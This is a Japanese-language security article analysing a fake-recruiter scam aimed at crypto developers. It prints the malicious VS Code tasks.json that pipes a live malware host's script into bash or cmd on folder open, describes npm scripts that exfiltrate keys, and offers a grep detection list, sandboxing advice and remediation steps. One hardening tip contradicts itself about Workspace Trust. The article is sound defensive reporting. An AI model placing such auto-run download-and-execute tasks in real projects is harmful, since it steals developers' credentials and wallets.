伝染する面接：偽のリクルーターが開発者をハッキングする方法

要約：国家支援の攻撃の新しい波が、クリプト界のシニア開発者を標的にしている。詐欺師はリクルーターやCTOになりすまし、候補者に悪意のあるコードを開かせる。この記事では、「Martin Erazo」ケース、VS Codeの「tasks.json」エクスプロイト、そして生き残るために必要な「バーン・プロトコル」を分析する。

免責事項：この記事は、実在の人物のなりすましを含む特定のサイバーセキュリティインシデントについて報告しています。「Martin Erazo」および「Ara Vartanian」という名前は、攻撃者が使用したペルソナまたはアイデンティティを指します。これらの名前を持つ実在の人物はID盗難の無実の被害者であり、これらの悪意のある活動には関与していないと考えています。

---

---

1. 完璧な餌：「Martin Erazo」ペルソナ

それは、シニアエンジニアのすべてのツボを押さえたメッセージから始まる：

• 役割： CTO / リードアーキテクト。
• 予算： 600万ドルの資金調達確保済み。
• 技術： Web3、AI、分散型インフラ。

最近確認された攻撃では、「Martin Erazo」 を名乗るリクルーターがLinkedInを通じて連絡を取ってきた。プロフィールは実在の演劇監督の名前と写真を使用していたが、職歴は2025年に突然「ITプロジェクト管理」に転向したように偽造されていた——これは ハッキングされた、または購入されたアカウント の典型的な兆候である。

詐欺は素早く展開する。彼らは標準的なHRスクリーニングをスキップし、トップマネジメントとの「技術面接」に直接進む——このケースでは、実在の業界CTO Ara Vartanian（現在はLimit Breakに在籍）になりすましていた。

レッドフラグ： プロジェクト名が常に変わる。リクルーターは 「Betfin」（GameFiプラットフォーム）を売り込んでいるが、提供されたピッチデッキは 「SpaceXView」（メタバースプロジェクト）のものだ。この矛盾は、詐欺師が異なるキャンペーンの資産を使い回している証拠である。

2. 罠：「MVPコードを確認して」

偽の「CTO」は、彼らのMVPコードにあなたの専門的な目が必要だと主張する。彼らはGitHubリポジトリまたはZIPファイルへのリンクを送ってくる。彼らは面接 中、あるいはその直後にそれを開くよう急かす。

ここで攻撃が発生する。

彼らはあなたの親切心とエゴを悪用する。あなたはReactコンポーネントのバグを見つけるためにそこにいると思っている。実際には、バグはあなたの貯金を空にするために設計された「機能」なのだ。

3. 技術的エクスプロイト：ゼロクリック・マルウェア

攻撃者は、開発ツールを標的とした「ゼロクリック」または「ロークリック」の脆弱性を使用する。アプリを実行してもらう必要はない。フォルダを開いてもらう だけでいいのだ。

決定的な証拠 (The Smoking Gun)：.vscode/tasks.json

この特定のケースでは、リポジトリに武器化された .vscode/tasks.json ファイルが含まれていた。このファイルは、VS Codeにプロジェクトのビルド方法を指示するものだ。

悪意のあるコード：

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• "runOn": "folderOpen" ：これがキルスイッチだ。VS Codeでフォルダを開いた瞬間に、このタスクが自動的に実行される。
• ペイロード ：curlを使用して vscodesettingtask.vercel.app からスクリプトをダウンロードする。これは設定APIを装った既知のマルウェアホストだ。
• 結果 ：スクリプトはメモリ内で実行され、Chromeのパスワード、セッションCookie、SSHキーを即座に盗む。

プランB：package.jsonスクリプト

VS Codeのエクスプロイトが失敗した場合、彼らはnpmスクリプトを仕込む：

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

npm install または npm start を実行すると、server/server.js がトリガーされる。これは、環境変数（AWSキー、ウォレットシード）を攻撃者に流出させるローカルのC2（コマンド＆コントロール）スクリプトである。

4. レッドフラグ vs グリーンフラグ

手遅れになる前にどうやって見分けるか？

あなたが開発者なら、「プライベートリポジトリ」やZIPファイルには警戒すべきだ。正規の企業は、パブリックリポジトリや標準的なプラットフォームを通じた持ち帰り課題を使用する。

警告： 開発者が攻撃される方法はこれだけではない。Discordでの コラボレーターの罠 や、サプライチェーン攻撃 がどのように依存関係を侵害するかについても読んでほしい。

5. セキュリティプロトコル：安全に面接を受ける方法

あなたがシニア開発者なら、間違いなく 標的にされる。環境の堅牢化（ハードニング）は必須だ。

プロトコル1：「使い捨て」環境 (Burner)

コードテストには、メインのワークステーションを 絶対に 使用してはいけない。

• 仮想マシン： VirtualBoxやVMWareを使用する。
• クラウドIDE： GitHub CodespacesやGitpodを使用する。これらは一時的であり、ローカルのウォレットファイルから分離されている。

プロトコル2：フォレンジック監査

未知のコードを開く前に 必ず 行うこと：

1. .vscode/tasks.jsonをチェック： runOn: folderOpen を探す。
2. package.jsonをチェック： 疑わしい preinstall や postinstall スクリプトを探す。
3. キーワード検索： curl, wget, os.homedir(), .ssh, wallet でgrep検索する。

プロトコル3：VS Codeの堅牢化

「ワークスペースの信頼（Workspace Trust）」をグローバルに無効にする。

• 設定 -> セキュリティ -> ワークスペース -> 信頼：起動時のプロンプト -> 常に（Always）。
• これにより、VS Codeはフォルダレベルのタスクを実行する前に、必ず許可を求めるようになる。

6. 修復：「バーン・プロトコル」 (The Burn Protocol)

悪意のあるリポジトリ（「Martin Erazo」ペルソナが送ってきたようなもの）を開いてしまった場合、侵害されたと仮定せよ。システムの復元では 不十分 だ。

1. 切断： 直ちにイーサネットケーブルを抜く。
2. ウォレットを燃やす： 秘密鍵は失われた。クリーンなデバイス（スマホ）で 新しいウォレット を作成し、残りの資金を移動する。古いシードは二度と使わない。
3. セッションを殺す： Google, GitHub, AWSのすべてのデバイスからログアウトする。すべてのアクティブなセッションを取り消す。
4. SSHキーの監査： GitHub/GitLabの設定を確認する。攻撃者はバックドアアクセスを維持するために 自分たちの SSHキーを追加することがよくある。見覚えのないキーはすべて削除する。
5. 完全に消去する (Nuke It)： ドライブをワイプし、OSを再インストールする。ルートキットが消えたことを100%確信できる唯一の方法だ。

結論

「伝染する面接」詐欺は、あなたの専門知識を逆手に取る。問題を解決したいというあなたの意欲を標的にする。しかしWeb3において、パラノイア（執拗な猜疑心）は職業上の美徳である。すべてのアイデンティティを検証し、すべてのリポジトリをサンドボックス化し、コードを書くよう急かす「リクルーター」を決して信用してはいけない。